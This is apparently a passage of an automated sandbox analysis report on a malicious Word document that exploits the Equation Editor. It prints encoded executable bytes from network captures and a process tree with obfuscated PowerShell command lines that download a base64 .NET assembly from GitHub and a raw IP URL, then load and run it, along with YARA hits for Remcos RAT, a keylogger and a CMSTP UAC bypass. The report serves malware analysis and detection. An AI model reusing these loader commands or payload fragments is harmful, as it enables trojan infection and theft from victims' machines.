                                                                                                                                      Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                                                                                                                                      Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                      Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                      Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                      Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                      Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                      Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                      Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                      Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                      2024-10-05 12:52:54 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                      Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:08:52:44
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                      Imagebase:0x13fe20000
                                                                                                                                      File size:1'423'704 bytes
                                                                                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:08:52:45
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:543'304 bytes
                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:08:52:48
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS"
                                                                                                                                      Imagebase:0x350000
                                                                                                                                      File size:141'824 bytes
                                                                                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:08:52:49
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                      File size:427'008 bytes
                                                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:08:52:51
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"
                                                                                                                                      Imagebase:0x10a0000
                                                                                                                                      File size:427'008 bytes
                                                                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:08:52:56
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                      Imagebase:0xc30000
                                                                                                                                      File size:64'704 bytes
                                                                                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873764967.000000000051C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.874039059.000000000231E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:08:53:01
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom"
                                                                                                                                      Imagebase:0xc30000
                                                                                                                                      File size:64'704 bytes
                                                                                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:08:53:01
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ftrhfuxf"
                                                                                                                                      Imagebase:0xc30000
                                                                                                                                      File size:64'704 bytes
                                                                                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:08:53:01
                                                                                                                                      Start date:05/10/2024
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\inwrfmihsqs"
                                                                                                                                      Imagebase:0xc30000
                                                                                                                                      File size:64'704 bytes
                                                                                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:08:53:08
                                                                                                                                      Start date:05/10/2024
